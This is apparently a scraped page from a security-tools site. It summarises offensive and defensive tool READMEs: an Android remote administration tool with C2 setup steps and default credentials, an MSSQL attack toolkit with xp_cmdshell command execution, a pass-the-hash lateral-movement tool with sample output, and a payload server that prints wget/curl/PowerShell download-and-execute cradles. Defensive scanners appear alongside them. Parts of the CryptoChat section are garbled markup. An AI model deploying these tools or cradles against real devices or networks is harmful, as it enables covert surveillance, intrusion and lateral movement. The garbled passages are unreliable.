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Moukthar - Android Remote Administration Tool

By: Zion3R

Remote adminitration tool for android

  • Notifications listener
  • SMS listener
  • Phone call recording
  • Image capturing and screenshots
  • Persistence
  • Read & write contacts
  • List installed applications
  • Download & upload files
  • Get device location

  • Clone repository console git clone
  • Move server files to /var/www/html/ and install dependencies console mv moukthar/Server/* /var/www/html/ cd /var/www/html/c2-server composer install cd /var/www/html/web\ socket/ composer install The default credentials are username: android and password: the rastafarian in you
  • Set database credentials in c2-server/.env and web socket/.env
  • Execute database.sql
  • Start web socket server or deploy as service in linux console php Server/web\ socket/App.php # OR sudo mv Server/websocket.service /etc/systemd/system/ sudo systemctl daemon-reload sudo systemctl enable websocket.service sudo systemctl start websocket.service
  • Modify /etc/apache2/apache2.conf xml <Directory /var/www/html/c2-server> Options -Indexes DirectoryIndex app.php AllowOverride All Require all granted </Directory>
  • Set C2 server and web socket server address in client functionality/ ```java public static final String C2_SERVER = "http://localhost";

public static final String WEB_SOCKET_SERVER = "ws://localhost:8080"; ``` - Compile APK using Android Studio and deploy to target

  • Auto scroll logs on dashboard

BackDoorSim - An Educational Into Remote Administration Tools

By: Zion3R

BackdoorSim is a remote administration and monitoring tool designed for educational and testing purposes. It consists of two main components: ControlServer and BackdoorClient. The server controls the client, allowing for various operations like file transfer, system monitoring, and more.


This tool is intended for educational purposes only. Misuse of this software can violate privacy and security policies. The developers are not responsible for any misuse or damage caused by this software. Always ensure you have permission to use this tool in your intended environment.

  • File Transfer: Upload and download files between server and client.
  • Screenshot Capture: Take screenshots from the client's system.
  • System Information Gathering: Retrieve detailed system and security software information.
  • Camera Access: Capture images from the client's webcam.
  • Notifications: Send and display notifications on the client system.
  • Help Menu: Easy access to command information and usage.


To set up BackdoorSim, you will need to install it on both the server and client machines.

  1. Clone the repository:

shell $ git clone

  1. Navigate to the project directory:

shell $ cd BackDoorSim

  1. Install the required dependencies:

shell $ pip install -r requirements.txt


After starting both the server and client, you can use the following commands in the server's command prompt:

  • upload [file_path]: Upload a file to the client.
  • download [file_path]: Download a file from the client.
  • screenshot: Capture a screenshot from the client.
  • sysinfo: Get system information from the client.
  • securityinfo: Get security software status from the client.
  • camshot: Capture an image from the client's webcam.
  • notify [title] [message]: Send a notification to the client.
  • help: Display the help menu.


BackDoorSim is developed for educational purposes only. The creators of BackDoorSim are not responsible for any misuse of this tool. This tool should not be used in any unauthorized or illegal manner. Always ensure ethical and legal use of this tool.

DepNot: RansomwareSim

If you are interested in tools like BackdoorSim, be sure to check out my recently released RansomwareSim tool

BackdoorSim: An Educational into Remote Administration Tools

If you want to read our article about Backdoor


Contributions, suggestions, and feedback are welcome. Please create an issue or pull request for any contributions. 1. Fork the repository. 2. Create a new branch for your feature or bug fix. 3. Make your changes and commit them. 4. Push your changes to your forked repository. 5. Open a pull request in the main repository.


For any inquiries or further information, you can reach me through the following channels:

Route-Detect - Find Authentication (Authn) And Authorization (Authz) Security Bugs In Web Application Routes

By: Zion3R

Find authentication (authn) and authorization (authz) security bugs in web application routes:

Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry standard resources highlight the severity of the issue:

Supported web frameworks (route-detect IDs in parentheses):

  • Python: Django (django, django-rest-framework), Flask (flask), Sanic (sanic)
  • PHP: Laravel (laravel), Symfony (symfony), CakePHP (cakephp)
  • Ruby: Rails* (rails), Grape (grape)
  • Java: JAX-RS (jax-rs), Spring (spring)
  • Go: Gorilla (gorilla), Gin (gin), Chi (chi)
  • JavaScript/TypeScript: Express (express), React (react), Angular (angular)

*Rails support is limited. Please see this issue for more information.


Use pip to install route-detect:

$ python -m pip install --upgrade route-detect

You can check that route-detect is installed correctly with the following command:

$ echo 'print(1 == 1)' | semgrep --config $(routes which test-route-detect) -
Scanning 1 file.


Found '1 == 1', your route-detect installation is working correctly

1รขโ€โ€  print(1 == 1)

Ran 1 rule on 1 file: 1 finding.


route-detect provides the routes CLI command and uses semgrep to search for routes.

Use the which subcommand to point semgrep at the correct web application rules:

$ semgrep --config $(routes which django) path/to/django/code

Use the viz subcommand to visualize route information in your browser:

$ semgrep --json --config $(routes which django) --output routes.json path/to/django/code
$ routes viz --browser routes.json

If you're not sure which framework to look for, you can use the special all ID to check everything:

$ semgrep --json --config $(routes which all) --output routes.json path/to/code

If you have custom authn or authz logic, you can copy route-detect's rules:

$ cp $(routes which django) my-django.yml

Then you can modify the rule as necessary and run it like above:

$ semgrep --json --config my-django.yml --output routes.json path/to/django/code
$ routes viz --browser routes.json


route-detect uses poetry for dependency and configuration management.

Before proceeding, install project dependencies with the following command:

$ poetry install --with dev


Lint all project files with the following command:

$ poetry run pre-commit run --all-files


Run Python tests with the following command:

$ poetry run pytest --cov

Run Semgrep rule tests with the following command:

$ poetry run semgrep --test --config routes/rules/ tests/test_rules/

PySQLRecon - Offensive MSSQL Toolkit Written In Python, Based Off SQLRecon

By: Zion3R

PySQLRecon is a Python port of the awesome SQLRecon project by @sanjivkawa. See the commands section for a list of capabilities.


PySQLRecon can be installed with pip3 install pysqlrecon or by cloning this repository and running pip3 install .


All of the main modules from SQLRecon have equivalent commands. Commands noted with [PRIV] require elevated privileges or sysadmin rights to run. Alternatively, commands marked with [NORM] can likely be run by normal users and do not require elevated privileges.

Support for impersonation ([I]) or execution on linked servers ([L]) are denoted at the end of the command description.

adsi                 [PRIV] Obtain ADSI creds from ADSI linked server [I,L]
agentcmd [PRIV] Execute a system command using agent jobs [I,L]
agentstatus [PRIV] Enumerate SQL agent status and jobs [I,L]
checkrpc [NORM] Enumerate RPC status of linked servers [I,L]
clr [PRIV] Load and execute .NET assembly in a stored procedure [I,L]
columns [NORM] Enumerate columns within a table [I,L]
databases [NORM] Enumerate databases on a server [I,L]
disableclr [PRIV] Disable CLR integration [I,L]
disableole [PRIV] Disable OLE automation procedures [I,L]
disablerpc [PRIV] Disable RPC and RPC Out on linked server [I]
disablexp [PRIV] Disable xp_cmdshell [I,L]
enableclr [PRIV] Enable CLR integration [I,L]
enableole [PRIV] Enable OLE automation procedures [I,L]
enablerpc [PRIV] Enable RPC and RPC Out on linked server [I]
enablexp [PRIV] Enable xp_cmdshell [I,L]
impersonate [NORM] Enumerate users that can be impersonated
info [NORM] Gather information about the SQL server
links [NORM] Enumerate linked servers [I,L]
olecmd [PRIV] Execute a system command using OLE automation procedures [I,L]
query [NORM] Execute a custom SQL query [I,L]
rows [NORM] Get the count of rows in a table [I,L]
search [NORM] Search a table for a column name [I,L]
smb [NORM] Coerce NetNTLM auth via xp_dirtree [I,L]
tables [NORM] Enu merate tables within a database [I,L]
users [NORM] Enumerate users with database access [I,L]
whoami [NORM] Gather logged in user, mapped user and roles [I,L]
xpcmd [PRIV] Execute a system command using xp_cmdshell [I,L]


PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:


View global options:

pysqlrecon --help

View command specific options:

pysqlrecon [GLOBAL_OPTS] COMMAND --help

Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns rows), with the --database flag.

Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

--link and --impersonate and incompatible.


pysqlrecon uses Poetry to manage dependencies. Install from source and setup for development with:

git clone
cd pysqlrecon
poetry install
poetry run pysqlrecon --help

Adding a Command

PySQLRecon is easily extensible - see the template and instructions in resources


  • Add SQLRecon SCCM commands
  • Add Azure SQL DB support?

References and Credits

NimExec - Fileless Command Execution For Lateral Movement In Nim

By: Zion3R

Basically, NimExec is a fileless remote command execution tool that uses The Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later via hand-crafted RPC packets instead of WinAPI calls. It sends these packages over SMB2 and the svcctl named pipe.

NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM Authentication method over hand-crafted packages.

Since all required network packages are manually crafted and no operating system-specific functions are used, NimExec can be used in different operating systems by using Nim's cross-compilability support.

This project was inspired by Julio's SharpNoPSExec tool. You can think that NimExec is Cross Compilable and built-in Pass the Hash supported version of SharpNoPSExec. Also, I learned the required network packet structures from Kevin Robertson's Invoke-SMBExec Script.


nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim

The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.

Also, you can install the required Nim modules via Nimble with the following command:

nimble install ptr_math nimcrypto hostname


test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v

_..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\
.' '. |__|| |/ `.' `. .-'' '. .-'' '. / .'
. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . '
| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| |
| | | || || | | | | || |`. \ .' /| || |
| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. '
| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. .
| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/
| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ /
| | | | .' / `. `. `
'--' '--' '----' '----'


[+] Connected to
[+] NTLM Authentication with Hash is succesfull!
[+] Connected to IPC Share of target!
[+] Opened a handle for svcctl pipe!
[+] Bound to the RPC Interface!
[+] RPC Binding is acknowledged!
[+] SCManager handle is obtained!
[+] Number of obtained services: 265
[+] Selected service is LxpSvc
[+] Service: LxpSvc is opened!
[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs
[+] Service config is changed!
[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)
[+] Service start request is sent!
[+] Service config is restored!
[+] Service handle is closed!
[+] Service Manager handle is closed!
[+] SMB is closed!
[+] Tree is disconnected!
[+] Session logoff!

It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and Windows 10 machines.

Command Line Parameters

    -v | --verbose                          Enable more verbose output.
-u | --username <Username> Username for NTLM Authentication.*
-h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*
-t | --target <Target> Lateral movement target.*
-c | --command <Command> Command to execute.*
-d | --domain <Domain> Domain name for NTLM Authentication.
-s | --service <Service Name> Name of the service instead of a random one.
--help Show the help message.


CryptoChat - Beyond Secure Messaging

By: Zion3R

Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

  1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
  2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
  3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
  4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
  5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
  6. Group Chats: Have encrypted conversations with multiple people at once.

  • Python 3.x
  • cryptography
  • colorama

  1. Clone the repository:

    git clone
  2. Navigate to the project directory:

    cd CryptoChat
  3. Install the required dependencies:

    pip install -r requirements.txt

bind the server to. --port PORT The port number to bind the server to. -------------------------------------------------------------------------- $ python3 --help usage: [-h] [--host HOST] [--port PORT] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The server's IP address. --port PORT The port number of the server." dir="auto">
$ python3 --help
usage: [-h] [--host HOST] [--port PORT]

Start the chat server.

-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
$ python3 --help
usage: [-h] [--host HOST] [--port PORT]

Connect to the chat server.

-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.

secret key for encryption. (Default=mysecretpassword) -------------------------------------------------------------------------- $ python3 --help usage: [-h] [--host HOST] [--port PORT] [--key KEY] Connect to the chat server. options: -h, --help show this help message and exit --host HOST The IP address to bind the server to. (Default= --port PORT The port number to bind the server to. (Default=12345) --key KEY The secret key for encryption. (Default=mysecretpassword)" dir="auto">
$ python3 --help
usage: [-h] [--host HOST] [--port PORT] [--key KEY]

Start the chat server.

-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
$ python3 --help
usage: [-h] [--host HOST] [--port PORT] [--key KEY]

Connect to the chat server.

-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encr yption. (Default=mysecretpassword)
  • --help: show this help message and exit
  • --host: The IP address to bind the server.
  • --port: The port number to bind the server.
  • --key : The secret key for encryption

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:

Qu1Ckdr0P2 - Quicky Serve Files Over Http Or Https Using Flask

By: Zion3R

Rapidly host payloads and post-exploitation bins over HTTP or HTTPS.

Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.

Pull requests and issues welcome. As are any contributions.

Qu1ckdr0p2 comes with an alias and search feature. The tools are located in the qu1ckdr0p2-tools repository. By default it will generate a self-signed certificate to use when using the --https option, priority is also given to the tun0 interface when the webserver is running, otherwise it will use eth0.

The common.ini defines the mapped aliases used within the --search and -u options.

When the webserver is running there are several download cradles printed to the screen to copy and paste.

pip3 install qu1ckdr0p2

echo "alias serv='~/.local/bin/serv'" >> ~/.zshrc
source ~/.zshrc


echo "alias serv='~/.local/bin/serv'" >> ~/.bashrc
source ~/.bashrc

serv init --update

$ serv serve -f implant.bin --https 443
$ serv serve -f file.example --http 8080

$ serv --help            
Usage: serv [OPTIONS] COMMAND [ARGS]...

Welcome to qu1ckdr0p2 entry point.

--debug Enable debug mode.
--help Show this message and exit.

init Perform updates.
serve Serve files.
dynamic number -f, --file FILE Serve a file --http INTEGER Use HTTP with a custom port --https INTEGER Use HTTPS with a custom port -h, --help Show this message and exit." dir="auto">
$ serv serve --help
Usage: serv serve [OPTIONS]

Serve files.

-l, --list List aliases
-s, --search TEXT Search query for aliases
-u, --use INTEGER Use an alias by a dynamic number
-f, --file FILE Serve a file
--http INTEGER Use HTTP with a custom port
--https INTEGER Use HTTPS with a custom port
-h, --help Show this message and exit.
$ serv init --help       
Usage: serv init [OPTIONS]

Perform updates.

--update Check and download missing tools.
--update-self Update the tool using pip.
--update-self-test Used for dev testing, installs unstable build.
--help Show this message and exit.
$ serv init --update
$ serv init --update-self

The mapped alias numbers for the -u option are dynamic so you don't have to remember specific numbers or ever type out a tool name.

ligolo [โ†’] Path: ~/.qu1ckdr0p2/windows/agent.exe [โ†’] Alias: ligolo_agent_win [โ†’] Use: 1 [โ†’] Path: ~/.qu1ckdr0p2/windows/proxy.exe [โ†’] Alias: ligolo_proxy_win [โ†’] Use: 2 [โ†’] Path: ~/.qu1ckdr0p2/linux/agent [โ†’] Alias: ligolo_agent_linux [โ†’] Use: 3 [โ†’] Path: ~/.qu1ckdr0p2/linux/proxy [โ†’] Alias: ligolo_proxy_linux [โ†’] Use: 4 (...)" dir="auto">
$ serv serve --search ligolo               

[โ†’] Path: ~/.qu1ckdr0p2/windows/agent.exe
[โ†’] Alias: ligolo_agent_win
[โ†’] Use: 1

[โ†’] Path: ~/.qu1ckdr0p2/windows/proxy.exe
[โ†’] Alias: ligolo_proxy_win
[โ†’] Use: 2

[โ†’] Path: ~/.qu1ckdr0p2/linux/agent
[โ†’] Alias: ligolo_agent_linux
[โ†’] Use: 3

[โ†’] Path: ~/.qu1ckdr0p2/linux/proxy
[โ†’] Alias: ligolo_proxy_linux
[โ†’] Use: 4
$ serv serve --search ligolo -u 3 --http 80

[โ†’] Serving: ../../.qu1ckdr0p2/linux/agent
[โ†’] Protocol: http
[โ†’] IP address:
[โ†’] Port: 80
[โ†’] Interface: eth0
[โ†’] CTRL+C to quit

[โ†’] URL:

[โ†“] csharp:
$webclient = New-Object System.Net.WebClient; $webclient.DownloadFile('', 'c:\windows\temp\agent'); Start-Process 'c:\windows\temp\agent'

[โ†“] wget:
wget -O /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[โ†“] curl:
curl -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent

[โ†“] powershell:
Invoke-WebRequest -Uri -OutFile c:\windows\temp\agent; Start-Process c:\windows\temp\agent

โ ง Web server running


DNSWatch - DNS Traffic Sniffer and Analyzer

By: Zion3R

DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.ย 


  • Sniff and analyze DNS requests and responses.
  • Display DNS requests with their corresponding source and destination IP addresses.
  • Optional verbose mode for detailed packet inspection.
  • Save the results to a specified output file.
  • Filter DNS traffic by specifying a target IP address.
  • Save DNS requests in a database for further analysis(optional)
  • Analyze DNS types (optional).
  • Support for DNS over HTTPS (DoH) (optional).


  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher


  1. Clone this repository:
git clone
  1. Install the required dependencies:
pip install -r requirements.txt


python -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
  • -i, --interface: Specify the network interface (e.g., eth0).
  • -v, --verbose: Use this flag for more verbose output.
  • -o, --output: Specify the filename to save results.
  • -t, --target-ip: Specify a specific target IP address to monitor.
  • -adt, --analyze-dns-types: Analyze DNS types.
  • --doh: Use DNS over HTTPS (DoH) for resolving DNS requests.
  • -fd, --target-domains: Filter DNS requests by specified domains.
  • -d, --database: Enable database storage for DNS requests.

Press Ctrl+C to stop the sniffing process.


  • Sniff DNS traffic on interface "eth0":
python -i eth0
  • Sniff DNS traffic on interface "eth0" and save the results to a file:
python -i eth0 -o dns_results.txt
  • Sniff DNS traffic on interface "eth0" and filter requests/responses involving a specific target IP:
python -i eth0 -k
  • Sniff DNS traffic on interface "eth0" and enable DNS type analysis:
python -i eth0 --analyze-dns-types
  • Sniff DNS traffic on interface "eth0" using DNS over HTTPS (DoH):
python -i eth0 --doh
  • Sniff DNS traffic on interface "wlan0" and Enable database storage
python3 -i wlan0 --database


DNSWatch is licensed under the MIT License. See the LICENSE file for details.


This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.


Trawler - PowerShell Script To Help Incident Responders Discover Adversary Persistence Mechanisms

By: Zion3R

Dredging Windows for Persistence

What is it?

Trawler is a PowerShell script designed to help Incident Responders discover potential indicators of compromise on Windows hosts, primarily focused on persistence mechanisms including Scheduled Tasks, Services, Registry Modifications, Startup Items, Binary Modifications and more.

Currently, trawler can detect most of the persistence techniques specifically called out by MITRE and Atomic Red Team with more detections being added on a regular basis.

Main Features

  • Scanning Windows OS for a variety of persistence techniques (Listed below)
  • CSV Output with MITRE Technique and Investigation Jumpstart Metadata
  • Analysis and Remediation Guidance Documentation (
  • Dynamic Risk Assignment for each detection
  • Built-in Allow Lists for common Windows configurations spanning Windows 10/Server 2012|2016|2019|2022 to reduce noise
  • Capture persistence metadata from 'golden' enterprise image for use as a dynamic allow-list at runtime
  • Analyze mounted disk images via drive re-targeting

How do I use it?

Just download and run trawler.ps1 from an Administrative PowerShell/cmd prompt - any detections will be displayed in the console as well as written to a CSV ('detections.csv') in the current working directory. The generated CSV will contain Detection Name, Source, Risk, Metadata and the relevant MITRE Technique.

Or use this one-liner from an Administrative PowerShell terminal:

iex ((New-Object System.Net.WebClient).DownloadString(''))

Certain detections have allow-lists built-in to help remove noise from default Windows configurations (10/2016/2019/2022) - expected Scheduled Tasks, Services, etc. Of course, it is always possible for attackers to hijack these directly and masquerade with great detail as a default OS process - take care to use multiple forms of analysis and detection when dealing with skillful adversaries.

If you have examples or ideas for additional detections, please feel free to submit an Issue or PR with relevant technical details/references - the code-base is a little messy right now and will be cleaned up over time.

Additionally, if you identify obvious false positives, please let me know by opening an issue or PR on GitHub! The obvious culprits for this will be non-standard COMs, Services or Tasks.

CLI Parameters

-scanoptions : Tab-through possible detections and select a sub-set using comma-delimited terms (eg. .\trawler.ps1 -scanoptions Services,Processes)
-hide : Suppress Detection output to console
-snapshot : Capture a "persistence snapshot" of the current system, defaulting to "$PSScriptRoot\snapshot.csv"
-snapshotpath : Define a custom file-path for saving snapshot output to.
-outpath : Define a custom file-path for saving detection output to (defaults to "$PSScriptRoot\detections.csv")
-loadsnapshot : Define the path for an existing snapshot file to load as an allow-list reference
-drivetarget : Define the variable for a mounted target drive (eg. .\trawler.ps1 -targetdrive "D:") - using this alone leads to an 'assumed homedrive' variable of C: for analysis purposes

What separates this from PersistenceSniper?

PersistenceSniper is an awesome tool - I've used it heavily in the past - but there are a few key points that differentiate these utilities

  • trawler is (currently) a local utility - it would be pretty straight-forward to wrap it in a loop and use WinRM/PowerShell Sessions to execute it on remote hosts though
  • trawler implements allow-listing for many 'noisy' detections to help remove expected detections from default configurations of Windows (10/2016/2019/2022) and these are constantly being updated
    • PersistenceSniper (for the most part) does not contain any type of allow-listing - therefore, there is more noise generated when considering items such as Services, Scheduled Tasks, general COM DLL scanning, etc.
  • trawler's output is much more simplified - Name, Risk, Source, MITRE Technique and Metadata are the only items provided for each detection to help analysts jump-start their persistence hunting efforts
  • Regex is used in many checks to help detect 'suspicious' keywords or patterns in various critical areas including scanned file contents, registry values, etc.
  • trawler supports 'snapshotting' a system (for example, an enterprise golden image) then using the generated snapshot as an allow-list to reduce noise.
  • trawler supports 'drive-retargeting' to check dead-boxes mounted to an analysis machine.

Overall, these tools are extremely similar but approach the problem from slightly different angles - PersistenceSniper provides all information back to the analyst for review while Trawler tries to limit what is returned to only results that are likely to be potential adversary persistence mechanisms. As such, there is a possibility for false-negatives with trawler if an adversary completely mimics an allow-listed item.

Tuning to your environment

Trawler supports loading an allow-list from a 'snapshot' - to do this requires two steps.

  1. Run '.\trawler.ps1 -snapshot' on a "Golden Image" representing the servers in your environment - once complete, in addition to the standard 'detections.csv' a file named 'snapshots.csv' will be generated
  2. This file can then be used as input to trawler when running on other hosts and the data will be loaded dynamically as an allow-list for each appropriate detection
    1. '.\trawler.ps1' -loadsnapshot "path\to\snapshot.csv"

That's it - all relevant detections will then draw from the snapshot file as an allow-list to reduce noise and identify any potential changes to the base image that may have occurred.

(Allow-listing is implemented for most of the checks but not all - still being actively implemented)

Drive ReTargeting

Often during an investigation, analysts may end up mounting a new drive that represents an imaged Windows device - Trawler now partially supports scanning these mounted drives through the use of the '-drivetarget' parameter.

At runtime, Trawler will re-target temporary script-level variables for use in checking file-based artifacts and also will attempt to load relevant Registry Hives (HKLM\SOFTWARE, HKLM\SYSTEM, NTUSER.DATs, USRCLASS.DATs) underneath HKLM/HKU and prefixed by 'ANALYSIS_'. Trawler will also attempt to unload these temporarily loaded hives upon script completion.

As an example, if you have an image mounted at a location such as 'F:\Test' which contains the NTFS file system ('F:\Test\Windows', 'F:\Test\User', etc) then you can invoke trawler like below;

.\trawler.ps1 -drivetarget "F:\Test"

Please note that since trawler attempts to load the registry hive files from the drive in question, mapping a UNC path to a live remote device will NOT work as those files will not be accessible due to system locks. I am working on an approach which will handle live remote devices, stay tuned.

What is not inspected when drive retargeting?

  • Running Processes
  • Network Connections
  • 'Phantom' DLLs
  • WMI Consumers (Being worked on)
  • BITS Jobs (Being worked on)
  • Certificate Parsing (Being worked on)

Most other checks will function fine because they are based entirely on reading registry hives or file-based artifacts (or can be converted to do so, such as directly reading Task XML as opposed to using built-in command-lets.)

Any limitations in checks when doing drive-retargeting will be discussed more fully in the GitHub Wiki.

Example Imagesย 


What is inspected?

  • Scheduled Tasks
  • Users
  • Services
  • Running Processes
  • Network Connections
  • WMI Event Consumers (CommandLine/Script)
  • Startup Item Discovery
  • BITS Jobs Discovery
  • Windows Accessibility Feature Modifications
  • PowerShell Profile Existence
  • Office Addins from Trusted Locations
  • SilentProcessExit Monitoring
  • Winlogon Helper DLL Hijacking
  • Image File Execution Option Hijacking
  • RDP Shadowing
  • UAC Setting for Remote Sessions
  • Print Monitor DLLs
  • LSA Security and Authentication Package Hijacking
  • Time Provider DLLs
  • Print Processor DLLs
  • Boot/Logon Active Setup
  • User Initialization Logon Script Hijacking
  • ScreenSaver Executable Hijacking
  • Netsh DLLs
  • AppCert DLLs
  • AppInit DLLs
  • Application Shimming
  • COM Object Hijacking
  • LSA Notification Hijacking
  • 'Office test' Usage
  • Office GlobalDotName Usage
  • Terminal Services DLL Hijacking
  • Autodial DLL Hijacking
  • Command AutoRun Processor Abuse
  • Outlook OTM Hijacking
  • Trust Provider Hijacking
  • LNK Target Scanning (Suspicious Terms, Multiple Extensions, Multiple EXEs)
  • 'Phantom' Windows DLL Names loaded into running process (eg. un-signed WptsExtensions.dll)
  • Scanning Critical OS Directories for Unsigned EXEs/DLLs
  • Un-Quoted Service Path Hijacking
  • PATH Binary Hijacking
  • Common File Association Hijacks and Suspicious Keywords
  • Suspicious Certificate Hunting
  • GPO Script Discovery/Scanning
  • NLP Development Platform DLL Overrides
  • AeDebug/.NET/Script/Process/WER Debug Replacements
  • Explorer 'Load'
  • Windows Terminal startOnUserLogin Hijacks
  • App Path Mismatches
  • Service DLL/ImagePath Mismatches
  • GPO Extension DLLs
  • Potential COM Hijacks
  • Non-Standard LSA Extensions
  • DNSServerLevelPluginDll Presence
  • Explorer\MyComputer Utility Hijack
  • Terminal Services InitialProgram Check
  • RDP Startup Programs
  • Microsoft Telemetry Commands
  • Non-Standard AMSI Providers
  • Internet Settings LUI Error DLL
  • PeerDist\Extension DLL
  • ErrorHandler.CMD Checks
  • Built-In Diagnostics DLL
  • MiniDumpAuxiliary DLLs
  • KnownManagedDebugger DLLs
  • WOW64 Compatibility Layer DLLs
  • EventViewer MSC Hijack
  • Uninstall Strings Scan
  • PolicyManager DLLs
  • SEMgr Wallet DLL
  • WER Runtime Exception Handlers
  • HTML Help (.CHM)
  • Remote Access Tool Artifacts (Files, Directories, Registry Keys)
  • ContextMenuHandler DLL Checks
  • Office AI.exe Presence
  • Notepad++ Plugins
  • MSDTC Registry Hijacks
  • Narrator DLL Hijack (MSTTSLocEnUS.DLL)
  • Suspicious File Location Checks


MITRE Techniques Evaluated

Please be aware that some of these are (of course) more detected than others - for example, we are not detecting all possible registry modifications but rather inspecting certain keys for obvious changes and using the generic MITRE technique "Modify Registry" where no other technique is applicable. For other items such as COM hijacking, we are inspecting all entries in the relevant registry section, checking against 'known-good' patterns and bubbling up unknown or mismatched values, resulting in a much more complete detection surface for that particular technique.

  • T1037: Boot or Logon Initialization Scripts
  • T1037.001: Boot or Logon Initialization Scripts: Logon Script (Windows)
  • T1037.005: Boot or Logon Initialization Scripts: Startup Items
  • T1055.001: Process Injection: Dynamic-link Library Injection
  • T1059: Command and Scripting Interpreter
  • T1071: Application Layer Protocol
  • T1098: Account Manipulation
  • T1112: Modify Registry
  • T1053: Scheduled Task/Job
  • T1136: Create Account
  • T1137.001: Office Application Office Template Macros
  • T1137.002: Office Application Startup: Office Test
  • T1137.006: Office Application Startup: Add-ins
  • T1197: BITS Jobs
  • T1505.005: Server Software Component: Terminal Services DLL
  • T1543.003: Create or Modify System Process: Windows Service
  • T1546: Event Triggered Execution
  • T1546.001: Event Triggered Execution: Change Default File Association
  • T1546.002: Event Triggered Execution: Screensaver
  • T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription
  • T1546.007: Event Triggered Execution: Netsh Helper DLL
  • T1546.008: Event Triggered Execution: Accessibility Features
  • T1546.009: Event Triggered Execution: AppCert DLLs
  • T1546.010: Event Triggered Execution: AppInit DLLs
  • T1546.011: Event Triggered Execution: Application Shimming
  • T1546.012: Event Triggered Execution: Image File Execution Options Injection
  • T1546.013: Event Triggered Execution: PowerShell Profile
  • T1546.015: Event Triggered Execution: Component Object Model Hijacking
  • T1547.002: Boot or Logon Autostart Execution: Authentication Packages
  • T1547.003: Boot or Logon Autostart Execution: Time Providers
  • T1547.004: Boot or Logon Autostart Execution: Winlogon Helper DLL
  • T1547.005: Boot or Logon Autostart Execution: Security Support Provider
  • T1547.009: Boot or Logon Autostart Execution: Shortcut Modification
  • T1547.012: Boot or Logon Autostart Execution: Print Processors
  • T1547.014: Boot or Logon Autostart Execution: Active Setup
  • T1553: Subvert Trust Controls
  • T1553.004: Subvert Trust Controls: Install Root Certificate
  • T1556.002: Modify Authentication Process: Password Filter DLL
  • T1574: Hijack Execution Flow
  • T1574.007: Hijack Execution Flow: Path Interception by PATH Environment Variable
  • T1574.009: Hijack Execution Flow: Path Interception by Unquoted Path


This tool would not exist without the amazing InfoSec community - the most notable references I used are provided below.

More References

Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

By: Zion3R

Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.

Columbus returned 638 subdomains of in 0.231 sec.


By default Columbus returns only the subdomains in a JSON string array:

curl ''

But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.


curl -s -H "Accept: text/plain" "$DOMAIN" | \
while read SUB
if [[ "$SUB" == "" ]]
echo "$HOST"

For more, check the features or the API documentation.


Currently, entries are got from Certificate Transparency.

Command Line

Usage of columbus-server:
Check for updates.
-config string
Path to the config file.
Print version informations.

-check: Check the lates version on GitHub. Prints up-to-date and returns 0 if no update required. Prints the latest tag (eg.: v0.9.1) and returns 1 if new release available. In case of error, prints the error message and returns 2.


git clone
make build


Create a new user:

adduser --system --no-create-home --disabled-login columbus-server

Create a new group:

addgroup --system columbus

Add the new user to the new group:

usermod -aG columbus columbus-server

Copy the binary to /usr/bin/columbus-server.

Make it executable:

chmod +x /usr/bin/columbus-server

Create a directory:

